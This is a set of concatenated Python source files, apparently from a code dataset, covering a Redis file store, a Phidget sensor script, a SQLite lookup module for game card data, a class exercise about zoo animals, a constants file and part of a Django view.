get_index_pool()\n self.md5_prefix = '_md5'\n self.files = RedisFetcher(\n \"HGETALL\",\n self.key,\n formatter=lambda s: {\n k: v for k,\n v in convert_list_to_dict(s).items() if not k.endswith(\"_md5\")\n }, pool=self.pool)\n\n def get_file(self, name):\n with self.pool.ctx() as conn:\n return conn.execute(\"HGET\", self.key, name)\n\n def get_file_md5(self, name):\n name_md5 = name + self.md5_prefix\n with self.pool.ctx() as conn:\n return conn.execute(\"HGET\", self.key, name_md5)\n\n def set_file(self, name, source):\n m = md5.new(source)\n name_md5 = name + self.md5_prefix\n hexdigest = m.hexdigest()\n with self.pool.ctx() as conn:\n check_sum = self.get_file_md5(name)\n if check_sum == hexdigest:\n return\n conn.execute(\n \"HMSET\", self.key,\n name, source,\n name_md5, hexdigest)\n # FIXME\n path = \"data/region{}\".format(self.id)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(\"data/region{}/{}.csv\".format(self.id, name), \"w\") as f:\n f.write(source)\n\n def del_file(self, name):\n name_md5 = name + self.md5_prefix\n with self.pool.ctx() as conn:\n conn.execute(\"HDEL\", self.key, name, name_md5)\n\n def get_names(self):\n with self.pool.ctx() as conn:\n return [e for e in conn.execute(\n \"HKEYS\", self.key\n ) if not e.endswith(self.md5_prefix)]\n\n def check_files(self, path):\n files = set()\n for filename in os.listdir(path):\n if not fnmatch.fnmatch(filename, \"*.csv\"):\n continue\n fullname = os.path.join(path, filename)\n name, _ = os.path.splitext(filename)\n with open(fullname) as f:\n self.set_file(name, f.read())\n files.add(name)\n for filename in self.get_names():\n name, _ = os.path.splitext(filename)\n if name not in files:\n 
self.del_file(name)\n\n def load_configs(self, configs, path, **sources):\n if not sources:\n sources = self.files.fetch()\n load(configs, path, **sources)\n","sub_path":"server/pokemon_server/common/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"278880376","text":"#!/usr/bin/env python\r\n\r\n\"\"\"\r\nPhidget Interface Kit module\r\n\r\n\"\"\"\r\n\r\n# Basic imports\r\nimport sys\r\nfrom Phidgets.PhidgetException import PhidgetException\r\nfrom Phidgets.Devices.InterfaceKit import InterfaceKit\r\n\r\n# Create an interface kit object\r\ntry:\r\n interfaceKit = InterfaceKit()\r\nexcept RuntimeError as e:\r\n print(\"Runtime Exception: %s\" % e.details)\r\n print(\"Exiting....\")\r\n exit(1)\r\n\r\n# Information Display Function\r\n\r\n\r\ndef display_device_info():\r\n print(\"|------------|----------------------------------|--------------|------------|\")\r\n print(\"|- Attached -|- Type -|- Serial No. -|- Version -|\")\r\n print(\"|------------|----------------------------------|--------------|------------|\")\r\n print(\"|- %5s -|- %30s -|- %10d -|- %8d -|\" % (interfaceKit.isAttached(), interfaceKit.getDeviceName(), interfaceKit.getSerialNum(), interfaceKit.getDeviceVersion()))\r\n print(\"|------------|----------------------------------|--------------|------------|\")\r\n print(\"Number of Digital Inputs: %i\" % (interfaceKit.getInputCount()))\r\n print(\"Number of Digital Outputs: %i\" % (interfaceKit.getOutputCount()))\r\n print(\"Number of Sensor Inputs: %i\" % (interfaceKit.getSensorCount()))\r\n\r\n# Event Handler Callback Functions\r\n\r\n\r\ndef interface_kit_attached(e):\r\n attached = e.device\r\n print(\"InterfaceKit %i Attached!\" % (attached.getSerialNum()))\r\n\r\n\r\ndef interface_kit_detached(e):\r\n detached = e.device\r\n print(\"InterfaceKit %i Detached!\" % (detached.getSerialNum()))\r\n\r\n\r\ndef interface_kit_error(e):\r\n try:\r\n source = e.device\r\n print(\"InterfaceKit %i: Phidget Error %i: %s\" % (source.getSerialNum(), e.eCode, e.description))\r\n except PhidgetException as e:\r\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\r\n\r\n\r\ndef interface_kit_input_changed(e):\r\n source = e.device\r\n print(\"InterfaceKit %i: Input %i: %s\" % (source.getSerialNum(), e.index, e.state))\r\n\r\n\r\ndef interface_kit_sensor_changed(e):\r\n source = e.device\r\n print(\"InterfaceKit %i: Sensor %i: %i\" % (source.getSerialNum(), e.index, e.value))\r\n\r\n\r\ndef interface_kit_output_changed(e):\r\n source = e.device\r\n print(\"InterfaceKit %i: Output %i: %s\" % (source.getSerialNum(), e.index, e.state))\r\n\r\n# Main Program Code\r\ntry:\r\n # logging example, uncomment to generate a log file\r\n # interfaceKit.enableLogging(PhidgetLogLevel.PHIDGET_LOG_VERBOSE, \"phidgetlog.log\")\r\n\r\n interfaceKit.setOnAttachHandler(interface_kit_attached)\r\n interfaceKit.setOnDetachHandler(interface_kit_detached)\r\n interfaceKit.setOnErrorhandler(interface_kit_error)\r\n interfaceKit.setOnInputChangeHandler(interface_kit_input_changed)\r\n interfaceKit.setOnOutputChangeHandler(interface_kit_sensor_changed)\r\n interfaceKit.setOnSensorChangeHandler(interface_kit_output_changed)\r\nexcept PhidgetException as e:\r\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\r\n print(\"Exiting....\")\r\n exit(1)\r\n\r\nprint(\"Opening phidget object....\")\r\n\r\ntry:\r\n interfaceKit.openRemoteIP('169.254.4.87', 5001, -1, 
\"greenspy\")\r\nexcept PhidgetException as e:\r\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\r\n print(\"Exiting....\")\r\n exit(1)\r\n\r\nprint(\"Waiting for attach....\")\r\n\r\ntry:\r\n interfaceKit.waitForAttach(10000)\r\nexcept PhidgetException as e:\r\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\r\n try:\r\n interfaceKit.closePhidget()\r\n except PhidgetException as e:\r\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\r\n print(\"Exiting....\")\r\n exit(1)\r\n print(\"Exiting....\")\r\n exit(1)\r\nelse:\r\n display_device_info()\r\n\r\nprint(\"Setting the data rate for each sensor index to 4ms....\")\r\nfor i in range(interfaceKit.getSensorCount()):\r\n try:\r\n \r\n interfaceKit.setDataRate(i, 4)\r\n except PhidgetException as e:\r\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\r\n\r\nprint(\"Press Enter to quit....\")\r\n\r\nchr = sys.stdin.read(1)\r\n\r\nprint(\"Closing...\")\r\n\r\ntry:\r\n interfaceKit.closePhidget()\r\nexcept PhidgetException as e:\r\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\r\n print(\"Exiting....\")\r\n exit(1)\r\n\r\nprint(\"Done.\")\r\nexit(0)\r\n","sub_path":"GreenAutomation/GreenSpy/InterfaceKit-simple.py","file_name":"InterfaceKit-simple.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"109728121","text":"import os\nimport sqlite3\nfrom collections import defaultdict\nfrom functools import lru_cache\nfrom typing import Iterable, Sequence\n\nfrom cachetools import LFUCache\n\nfrom . import dataclasses as D\nfrom .utils import construct_tt_from_sql_shape\nfrom .wave_description_base import LANGUAGE_DEFINITION_JA\n\n\nclass MasterData(object):\n def __init__(self, master_path):\n self.version = os.path.basename(master_path.rstrip(\"/\"))\n self.connection = sqlite3.connect(\n \"file:{0}?mode=ro\".format(os.path.join(master_path, \"masterdata.db\")), uri=True\n )\n self.connection.row_factory = sqlite3.Row\n self.card_id_cache = LFUCache(256)\n self.member_cache = {}\n\n self.ordinal_to_cid = {\n ord: id for ord, id in self.connection.execute(\"SELECT school_idol_no, id FROM m_card\")\n }\n self.tt_stat_increases = self.distill_tt_stat_increases()\n print(f\"MasterData: alloc with {len(self.ordinal_to_cid)} cards\")\n\n def distill_tt_stat_increases(self):\n rs = self.connection.execute(\n \"\"\"\n SELECT m_card.id AS demux, training_content_type, required_grade, SUM(value)\n FROM m_card\n LEFT JOIN m_training_tree ON (m_training_tree.id = m_card.training_tree_m_id)\n LEFT JOIN m_training_tree_card_param ON (m_training_tree.training_tree_card_param_m_id = m_training_tree_card_param.id)\n LEFT JOIN m_training_tree_mapping ON (m_training_tree.training_tree_mapping_m_id = m_training_tree_mapping.id)\n LEFT JOIN m_training_tree_cell_content ON (\n m_training_tree_mapping.training_tree_cell_content_m_id = m_training_tree_cell_content.id AND\n m_training_tree_cell_content.training_content_no = m_training_tree_card_param.training_content_no AND\n m_training_tree_cell_content.training_tree_cell_type == 2)\n GROUP BY demux, required_grade, training_content_type\n ORDER BY demux, required_grade\"\"\"\n )\n\n ret = defaultdict(lambda: defaultdict(lambda: {}))\n for cid, stat, grade, sum_value in rs:\n ret[cid][grade][stat] = sum_value\n\n return {k: self.cumulative_tt_offset(v) for k, v in ret.items()}\n\n def cumulative_tt_offset(self, levels):\n ls = []\n a = 0\n s = 0\n t = 0\n for k, v in 
sorted(levels.items()):\n a += v.get(3, 0)\n s += v.get(2, 0)\n t += v.get(4, 0)\n ls.append(D.CardLevelValues(k, a, s, t))\n return ls\n\n def lookup_member_by_id(self, member_id: int):\n if member_id in self.member_cache:\n return self.member_cache[member_id]\n\n da = self.connection.execute(\n \"\"\"\n SELECT m_member.id, member_group, m_member_unit.member_unit AS subunit, school_grade AS year, name,\n name_romaji, birth_month, birth_day, m_member.theme_dark_color,\n\n m_member_group.group_name, m_member_unit.unit_name,\n\n thumbnail_image_asset_path,\n standing_image_asset_path, autograph_image_asset_path,\n member_icon_image_asset_path FROM m_member\n LEFT JOIN m_member_group USING (member_group)\n LEFT JOIN m_member_unit_detail ON (m_member_unit_detail.member_m_id == m_member.id)\n LEFT JOIN m_member_unit ON (m_member_unit_detail.member_unit == m_member_unit.member_unit)\n WHERE m_member.id = ? LIMIT 1\n \"\"\",\n (member_id,),\n ).fetchone()\n\n if not da:\n return None\n\n m = D.Member(*da)\n\n da = self.connection.execute(\n \"\"\"\n SELECT id, school_idol_no, card_rarity_type, card_attribute,\n role, thumbnail_asset_path\n FROM m_card\n LEFT JOIN m_card_appearance ON (card_m_id = m_card.id AND appearance_type == 1)\n WHERE member_m_id = ? ORDER BY m_card.school_idol_no DESC\n \"\"\",\n (member_id,),\n )\n\n m.card_brief = [D.CardLite(*row[:5], D.CardAppearance(None, None, row[5])) for row in da]\n\n self.member_cache[member_id] = m\n return m\n\n def lookup_member_list(self, group: int = None, subunit: int = None):\n if group and subunit:\n where = \"WHERE member_group = :group AND m_member_unit.member_unit = :unit\"\n elif group:\n where = \"WHERE member_group = :group\"\n elif subunit:\n where = \"WHERE m_member_unit.member_unit = :unit\"\n else:\n where = \"\"\n\n ids = self.connection.execute(\n f\"\"\"\n SELECT m_member.id FROM m_member\n LEFT JOIN m_member_unit_detail ON (m_member_unit_detail.member_m_id == m_member.id)\n LEFT JOIN m_member_unit ON (m_member_unit_detail.member_unit == m_member_unit.member_unit)\n {where}\n ORDER BY member_group, m_member_unit.member_unit, m_member.id\"\"\",\n {\"unit\": subunit, \"group\": group},\n )\n\n return [self.lookup_member_by_id(i) for i, in ids]\n\n def do_not_use_get_all_card_briefs(self):\n da = self.connection.execute(\n \"\"\"SELECT id, school_idol_no, card_rarity_type, card_attribute,\n role, thumbnail_asset_path\n FROM m_card\n LEFT JOIN m_card_appearance ON (card_m_id = m_card.id AND appearance_type == 1)\n ORDER BY m_card.school_idol_no\"\"\"\n )\n\n return [D.CardLite(*row[:5], D.CardAppearance(None, None, row[5])) for row in da]\n\n def all_ordinals(self):\n return sorted(self.ordinal_to_cid.keys())\n\n def card_ordinals_to_ids(self, ordinals: Iterable[int]):\n return [self.ordinal_to_cid.get(o) for o in ordinals]\n\n def lookup_card_by_id(self, card_id: int, use_cache: bool = True):\n if card_id in self.card_id_cache:\n return self.card_id_cache[card_id]\n\n da = self.connection.execute(\n \"\"\"\n SELECT member_m_id, id, school_idol_no, card_rarity_type, max_level, card_attribute,\n role, training_tree_m_id, sp_point, exchange_item_id, max_passive_skill_slot,\n m_card_attribute.background_asset_path, 0, parameter2, parameter1, parameter3\n FROM m_card\n LEFT JOIN m_card_rarity USING (card_rarity_type)\n LEFT JOIN m_card_attribute USING (card_attribute)\n LEFT JOIN m_card_awaken_parameter ON (card_master_id == m_card.id)\n WHERE m_card.id = ? 
LIMIT 1\n \"\"\",\n (card_id,),\n ).fetchone()\n\n if not da:\n return None\n member_id, *da = da\n card = D.Card(*da[:11])\n card.member = self.lookup_member_by_id(member_id)\n card.active_skill = self.lookup_active_skill_by_card_id(card.id)\n card.passive_skills = self.lookup_passive_skills_by_card_id(card.id)\n card.idolized_offset = D.CardLevelValues(*da[11:])\n card.tt_offset = self.tt_stat_increases.get(card.id)\n card.role_effect = self.lookup_role_effect(card.role)\n\n if not card.tt_offset:\n card.tt_offset = D.CardLevelValues(0, 0, 0, 0)\n\n stats = self.connection.execute(\n \"\"\"SELECT level, appeal, stamina, technique FROM\n m_card_parameter WHERE card_m_id = ? ORDER BY level\n \"\"\",\n (card_id,),\n )\n card.stats = [D.CardLevelValues(*r) for r in stats]\n\n appearances = self.connection.execute(\n \"\"\"\n SELECT appearance_type, card_name, image_asset_path, thumbnail_asset_path FROM m_card_appearance\n WHERE card_m_id = ? ORDER BY appearance_type LIMIT 2\n \"\"\",\n (da[0],),\n ).fetchall()\n for type_, *row in appearances:\n if type_ == 1:\n card.normal_appearance = D.CardAppearance(*row)\n if type_ == 2:\n card.idolized_appearance = D.CardAppearance(*row)\n\n if use_cache:\n self.card_id_cache[card.id] = card\n\n return card\n\n def lookup_multiple_cards_by_id(self, idset: Sequence[int]):\n if len(idset) >= 192:\n cache = False\n else:\n cache = True\n\n return [self.lookup_card_by_id(i, cache) for i in idset]\n\n def lookup_active_skill_by_card_id(self, card_id: int):\n ROOT_COUNT = 8\n\n da = self.connection.execute(\n \"\"\"\n SELECT skill_target_master_id1, m_active_skill.id, m_active_skill.name, m_active_skill.description,\n skill_type, trigger_probability, sp_gauge_point,\n m_active_skill.icon_asset_path, m_active_skill.thumbnail_asset_path,\n m_skill_effect.* FROM m_card_active_skill\n LEFT JOIN m_active_skill ON (active_skill_master_id == m_active_skill.id)\n LEFT JOIN m_skill ON (m_active_skill.skill_master_id == m_skill.id)\n LEFT JOIN m_skill_effect ON (m_skill.skill_effect_master_id1 == m_skill_effect.id)\n WHERE m_card_active_skill.card_master_id = ? ORDER BY skill_level\n \"\"\",\n (card_id,),\n )\n\n root = da.fetchone()\n if not root:\n return None\n\n target_id, *root = root\n skill = D.ActiveSkill(*root[:ROOT_COUNT])\n skill.levels = [root[ROOT_COUNT:]]\n for _, *level in da:\n skill.levels.append(level[ROOT_COUNT:])\n\n skill.target = self.lookup_skill_target_type(target_id)\n return skill\n\n def lookup_passive_skills_by_card_id(self, card_id: int):\n ROOT_COUNT = 10\n\n da = self.connection.execute(\n \"\"\"\n SELECT skill_target_master_id1, m_card_passive_skill_original.position,\n m_passive_skill.id, m_passive_skill.name, m_passive_skill.description,\n rarity, trigger_type, trigger_probability,\n m_passive_skill.icon_asset_path, m_passive_skill.thumbnail_asset_path,\n condition_type, condition_value,\n m_skill_effect.* FROM m_card_passive_skill_original\n LEFT JOIN m_passive_skill ON (passive_skill_master_id == m_passive_skill.id)\n LEFT JOIN m_skill ON (m_passive_skill.skill_master_id == m_skill.id)\n LEFT JOIN m_skill_condition ON (m_passive_skill.skill_condition_master_id1 == m_skill_condition.id)\n LEFT JOIN m_skill_effect ON (m_skill.skill_effect_master_id1 == m_skill_effect.id)\n WHERE m_card_passive_skill_original.card_master_id = ? 
ORDER BY position, skill_level\n \"\"\",\n (card_id,),\n )\n\n skills = []\n c_demux_key = None\n c_skill = None\n for target_id, demux_key, *actual in da:\n if demux_key != c_demux_key:\n if c_skill:\n skills.append(c_skill)\n c_skill = D.PassiveSkill(*actual[:ROOT_COUNT])\n c_skill.target = self.lookup_skill_target_type(target_id)\n c_skill.levels = []\n c_demux_key = demux_key\n c_skill.levels.append(actual[ROOT_COUNT:])\n\n if c_skill:\n skills.append(c_skill)\n\n return skills\n\n def lookup_song_list(self):\n da = self.connection.execute(\n \"\"\"\n SELECT live_id, name, member_group, member_unit, jacket_asset_path,\n m_member_group.group_name, m_member_unit.unit_name,\n m_live.display_order FROM m_live\n LEFT JOIN m_member_group USING (member_group)\n LEFT JOIN m_member_unit USING (member_unit)\n ORDER BY m_live.display_order\"\"\"\n )\n\n return [D.Live(*row) for row in da]\n\n def lookup_song_difficulties(self, for_song_id: int):\n da = self.connection.execute(\n \"\"\"\n SELECT name, member_group, member_unit, jacket_asset_path,\n m_member_group.group_name, m_member_unit.unit_name,\n m_live.display_order FROM m_live\n LEFT JOIN m_member_group USING (member_group)\n LEFT JOIN m_member_unit USING (member_unit)\n WHERE live_id = ? LIMIT 1\"\"\",\n (for_song_id,),\n )\n\n root = D.Live(for_song_id, *da.fetchone())\n da.close()\n\n da = self.connection.execute(\n \"\"\"\n SELECT live_difficulty_id,\n live_difficulty_type,\n evaluation_s_score,\n evaluation_a_score,\n evaluation_b_score,\n evaluation_c_score\n FROM m_live_difficulty\n WHERE m_live_difficulty.live_id = ?\n ORDER BY live_difficulty_type\"\"\",\n (for_song_id,),\n )\n\n diffs = []\n for row in da:\n the_diff = D.LiveDifficulty(*row)\n the_diff.stage_gimmicks = self.lookup_gimmicks_by_live_diff_id(the_diff.id)\n the_diff.note_gimmicks = self.lookup_note_gimmicks_by_live_diff_id(the_diff.id)\n the_diff.wave_missions = self.lookup_wave_descriptions_for_live_id(the_diff.id)\n diffs.append(the_diff)\n root.difficulties = diffs\n return root\n\n def lookup_note_gimmicks_by_live_diff_id(self, live_diff_id: int):\n ROOT_COUNT = 9\n\n da = self.connection.execute(\n \"\"\"\n SELECT skill_target_master_id1,\n COUNT(0),\n m_live_difficulty_note_gimmick.name,\n m_live_difficulty_note_gimmick.description,\n 0, 10000, 0, 0,\n NULL, NULL,\n m_skill_effect.* FROM m_live_difficulty_note_gimmick\n\n LEFT JOIN m_skill ON (m_live_difficulty_note_gimmick.skill_master_id == m_skill.id)\n LEFT JOIN m_skill_effect ON (m_skill.skill_effect_master_id1 == m_skill_effect.id)\n WHERE m_live_difficulty_note_gimmick.live_difficulty_id = ?\n GROUP BY skill_master_id\n \"\"\",\n (live_diff_id,),\n )\n\n skills = []\n for target_id, *actual in da:\n c_skill = D.ActiveSkill(*actual[:ROOT_COUNT])\n c_skill.target = self.lookup_skill_target_type(target_id)\n c_skill.levels = [actual[ROOT_COUNT:]]\n skills.append(c_skill)\n\n return skills\n\n def lookup_gimmicks_by_live_diff_id(self, live_diff_id: int):\n ROOT_COUNT = 10\n\n da = self.connection.execute(\n \"\"\"\n SELECT skill_target_master_id1,\n m_live_difficulty_gimmick.id,\n m_live_difficulty_gimmick.name,\n m_live_difficulty_gimmick.description,\n 0, trigger_type, 10000, NULL, NULL,\n condition_type, condition_value,\n m_skill_effect.* FROM m_live_difficulty_gimmick\n\n LEFT JOIN m_skill ON (m_live_difficulty_gimmick.skill_master_id == m_skill.id)\n LEFT JOIN m_skill_condition ON (m_live_difficulty_gimmick.condition_master_id1 == m_skill_condition.id)\n LEFT JOIN m_skill_effect ON 
(m_skill.skill_effect_master_id1 == m_skill_effect.id)\n WHERE m_live_difficulty_gimmick.live_difficulty_master_id = ?\n \"\"\",\n (live_diff_id,),\n )\n\n skills = []\n for target_id, *actual in da:\n c_skill = D.PassiveSkill(*actual[:ROOT_COUNT])\n c_skill.target = self.lookup_skill_target_type(target_id)\n c_skill.levels = [actual[ROOT_COUNT:]]\n skills.append(c_skill)\n\n return skills\n\n def lookup_wave_descriptions_for_live_id(self, live_diff_id: int):\n da = self.connection.execute(\n \"\"\"SELECT wave_id, name, description\n FROM m_live_note_wave_gimmick_group\n WHERE live_difficulty_id = ?\n ORDER BY wave_id\"\"\",\n (live_diff_id,),\n )\n return [D.LiveWaveMission(*x, LANGUAGE_DEFINITION_JA) for x in da.fetchall()]\n\n def lookup_all_accessory_skills(self):\n da = self.connection.execute(\n \"\"\"\n SELECT skill_target_master_id1, m_accessory_passive_skill.id,\n name, description, rarity, trigger_type, probability_at_level_min,\n m_accessory_passive_skill.icon_asset_path, m_accessory_passive_skill.thumbnail_asset_path,\n condition_type, condition_value,\n m_skill_effect.* FROM m_accessory_passive_skill\n LEFT JOIN m_accessory_passive_skill_level ON\n (m_accessory_passive_skill_level.accessory_passive_skill_master_id\n == m_accessory_passive_skill.id AND skill_level == 1)\n LEFT JOIN m_skill ON (m_accessory_passive_skill.skill_master_id == m_skill.id)\n LEFT JOIN m_skill_condition ON (m_accessory_passive_skill.skill_condition_master_id1 == m_skill_condition.id)\n LEFT JOIN m_skill_effect ON (m_skill.skill_effect_master_id1 == m_skill_effect.id)\n ORDER BY m_accessory_passive_skill.id\n \"\"\"\n )\n\n skills = []\n for target_id, *row in da:\n skill = D.PassiveSkill(*row[:10])\n skill.levels = [row[10:]]\n skill.target = self.lookup_skill_target_type(target_id)\n skills.append(skill)\n\n return skills\n\n def lookup_all_hirameku_skills(self):\n da = self.connection.execute(\n \"\"\"\n SELECT skill_target_master_id1, m_passive_skill.id,\n name, description, rarity, trigger_type, trigger_probability,\n m_passive_skill.icon_asset_path, m_passive_skill.thumbnail_asset_path,\n condition_type, condition_value,\n m_skill_effect.* FROM m_passive_skill\n LEFT JOIN m_skill ON (m_passive_skill.skill_master_id == m_skill.id)\n LEFT JOIN m_skill_condition ON (m_passive_skill.skill_condition_master_id1 == m_skill_condition.id)\n LEFT JOIN m_skill_effect ON (m_skill.skill_effect_master_id1 == m_skill_effect.id)\n WHERE m_passive_skill.id > 30000000\n ORDER BY m_passive_skill.id\n \"\"\"\n ).fetchall()\n\n skills = []\n for target_id, *row in da:\n skill = D.PassiveSkill(*row[:10])\n skill.levels = [row[10:]]\n skill.target = self.lookup_skill_target_type(target_id)\n skills.append(skill)\n\n return skills\n\n @lru_cache(4)\n def lookup_role_effect(self, role_id):\n da = self.connection.execute(\n \"\"\"\n SELECT * FROM m_card_role_effect WHERE id = ?\n \"\"\",\n (role_id,),\n ).fetchone()\n\n if not da:\n return None\n\n return D.CardRoleEffect(*da[1:])\n\n @lru_cache(maxsize=None)\n def lookup_skill_target_type(self, stid):\n basic = self.connection.execute(\n \"SELECT * FROM m_skill_target WHERE id = ? 
LIMIT 1\", (stid,)\n ).fetchone()\n if not basic:\n return None\n\n target_type = D.SkillTargetType(\n basic[\"id\"],\n basic[\"only_owner\"],\n basic[\"excluding_owner\"],\n basic[\"random_choose_count\"],\n basic[\"checking_owner_party\"],\n basic[\"checking_owner_school\"],\n basic[\"checking_owner_grade\"],\n basic[\"checking_owner_unit\"],\n basic[\"checking_owner_attribute\"],\n basic[\"checking_owner_role\"],\n )\n\n if basic[\"target_attribute_group_id\"]:\n group = self.connection.execute(\n \"\"\"SELECT attribute FROM m_skill_target_attribute_group\n WHERE group_id = ?\"\"\",\n (basic[\"target_attribute_group_id\"],),\n ).fetchall()\n target_type.fixed_attributes = [x[0] for x in group]\n if basic[\"target_member_group_id\"]:\n group = self.connection.execute(\n \"\"\"SELECT member_maseter_id FROM m_skill_target_member_group\n WHERE group_id = ? LIMIT 1\"\"\",\n (basic[\"target_member_group_id\"],),\n ).fetchall()\n target_type.fixed_members = [x[0] for x in group]\n if basic[\"target_unit_group_id\"]:\n group = self.connection.execute(\n \"\"\"SELECT member_unit FROM m_skill_target_unit_group\n WHERE group_id = ? LIMIT 1\"\"\",\n (basic[\"target_unit_group_id\"],),\n ).fetchall()\n target_type.fixed_subunits = [x[0] for x in group]\n if basic[\"target_school_group_id\"]:\n group = self.connection.execute(\n \"\"\"SELECT member_group FROM m_skill_target_school_group\n WHERE group_id = ? LIMIT 1\"\"\",\n (basic[\"target_school_group_id\"],),\n ).fetchall()\n target_type.fixed_schools = [x[0] for x in group]\n if basic[\"target_school_grade_group_id\"]:\n group = self.connection.execute(\n \"\"\"SELECT grade FROM m_skill_target_school_grade_group\n WHERE group_id = ? LIMIT 1\"\"\",\n (basic[\"target_school_grade_group_id\"],),\n ).fetchall()\n target_type.fixed_years = [x[0] for x in group]\n if basic[\"target_role_group_id\"]:\n group = self.connection.execute(\n \"\"\"SELECT role FROM m_skill_target_cardrole_group\n WHERE group_id = ? LIMIT 1\"\"\",\n (basic[\"target_role_group_id\"],),\n ).fetchall()\n target_type.fixed_roles = [x[0] for x in group]\n return target_type\n\n def lookup_batch_item_req_set(self, item_set_ids: Iterable[int]):\n id_list = \",\".join(str(int(x)) for x in set(item_set_ids))\n\n rows = self.connection.execute(\n f\"\"\"\n SELECT m_training_tree_cell_item_set.id, content_type, content_id,\n content_amount, thumbnail_asset_path, display_order\n FROM m_training_tree_cell_item_set\n LEFT JOIN m_training_material ON\n (content_type == 12 AND content_id == m_training_material.id)\n WHERE m_training_tree_cell_item_set.id IN ({id_list})\n ORDER BY m_training_tree_cell_item_set.id\"\"\"\n )\n\n items = {}\n struct = defaultdict(lambda: defaultdict())\n for (\n group,\n content_type,\n content_id,\n content_amount,\n thumbnail_asset_path,\n display_order,\n ) in rows:\n if content_type == 12:\n items[str(content_id)] = (thumbnail_asset_path, display_order)\n struct[group][str(content_id)] = content_amount\n else:\n struct[group][\"_gold\"] = content_amount\n return {\"items\": items, \"sets\": struct}\n\n def lookup_tt(self, ttid):\n tree = self.connection.execute(\n \"\"\"\n SELECT training_tree_cell_content_m_id, training_tree_design_m_id, training_tree_card_param_m_id\n FROM m_training_tree\n LEFT JOIN m_training_tree_mapping ON (training_tree_mapping_m_id = m_training_tree_mapping.id)\n WHERE m_training_tree.id = ? 
LIMIT 1\"\"\",\n (ttid,),\n ).fetchone()\n if not tree:\n return None\n\n content_track_id, shape_id, card_params = tree\n # We only care about stat increases for now...\n entries = self.connection.execute(\n \"\"\"SELECT m_training_tree_design.cell_id, parent_cell_id,\n parent_branch_type,\n training_tree_cell_type, required_grade,\n training_content_type, value,\n training_tree_cell_item_set_m_id\n FROM m_training_tree_design\n LEFT JOIN m_training_tree_cell_content ON\n (m_training_tree_design.cell_id = m_training_tree_cell_content.cell_id\n AND m_training_tree_cell_content.id = ?)\n LEFT JOIN m_training_tree_card_param ON\n (m_training_tree_card_param.training_content_no = m_training_tree_cell_content.training_content_no\n AND training_tree_cell_type = 2\n AND m_training_tree_card_param.id = ?)\n WHERE m_training_tree_design.id = ? ORDER BY m_training_tree_design.cell_id\"\"\",\n (content_track_id, card_params, shape_id),\n ).fetchall()\n\n if entries:\n item_sets = self.lookup_batch_item_req_set(e[-1] for e in entries if e)\n return (item_sets, *construct_tt_from_sql_shape(entries))\n\n return None\n\n def lookup_inline_image(self, iip):\n path = self.connection.execute(\n \"\"\"SELECT path FROM m_inline_image WHERE id=?\"\"\", (iip,)\n ).fetchone()\n if path:\n return path[0]\n # ???\n path = self.connection.execute(\n \"\"\"SELECT path FROM m_decoration_texture WHERE id=?\"\"\", (iip,)\n ).fetchone()\n if path:\n return path[0]\n\n return None\n","sub_path":"libcard2/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":24209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"414549190","text":"\n\n\nclass Animal():\n fierce = True\n\n # 类型”、“体型”、“性格”、“是否属于凶猛动物”四个属性\n def __init__(self,type,body_type,character):\n self.type = type\n self.body_type = body_type\n self.character = character\n self.set_fierce()\n def set_fierce(self):\n spec_type = ['中','大']\n if self.body_type in spec_type and self.type == \"食肉\":\n self.fierce = True\n else:\n self.fierce = False\n\nclass Cat(Animal):\n cry = \"喵喵喵....\"\n # 增加继承的属性\n def __init__(self,name,type,body_type,character,is_pet=True):\n self.name = name\n self.is_pet = is_pet\n super(Cat,self).__init__(type,body_type,character)\n\n pass\n\nclass Zoo():\n _animals_list = []\n def __init__(self,name):\n self.name = name\n\n def add_animal(self,animal):\n\n if animal not in self._animals_list:\n self._animals_list.append(animal)\n else:\n print(\"{}已经存在{}动物园\".format(animal,self.name))\n\n def showAnimals(self):\n # print(self._animals_list)\n return self._animals_list\n\n\n\nif __name__ == '__main__':\n # 实例化动物园\n z = Zoo('时间动物园')\n # 实例化一只猫,属性包括名字、类型、体型、性格\n cat1 = Cat('大花猫 1', '食肉', '小', '温顺')\n\n # 增加一只猫到动物园\n z.add_animal(cat1)\n # 动物园是否有猫这种动物\n have_cat = getattr(z,'cat1')\n\n print(have_cat)\n\n","sub_path":"week07/task/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"547064889","text":"window_width = 12\nacoustics_dim = [window_width, 80, 3]\nnovelty_dim = 10\nhomo_dim = 80\ndura_dim = 1\nZDIM = 128\naction_dim = 1\nsteps = 700\nbatch_size = 128\nnb_epoch = 100\n","sub_path":"constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"74369263","text":"from django.shortcuts import render, redirect\nfrom 
django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\nfrom .forms import GameForm\nfrom .models import Game\n\n@login_required\ndef list_view(request):\n user = request.user\n form = GameForm(request.POST or None)\n\n if(request.method == \"POST\"):\n if(form.is_valid()):\n cleaned = form.cleaned_data\n title = cleaned['title']\n min_buy_in = cleaned['min_buy_in']\n max_buy_in = cleaned['max_buy_in']\n currency = cleaned['currency']\n game = Game (\n title=title,\n min_buy_in=min_buy_in,\n max_buy_in=max_buy_in,\n currency=currency,\n user=user,\n )\n\n game.save()\n form = GameForm()\n messages.success(request, \"Game {0} successfully added\".format(game))\n\n games = (Game.objects.filter(public=True) | Game.objects.filter(user=user)).filter(deleted=False)\n context = {\n 'games': games,\n 'form': form,\n }\n return render(request, 'games/list.html', context)\n\n@login_required\ndef delete(request, pk):\n user = request.user\n\n game = 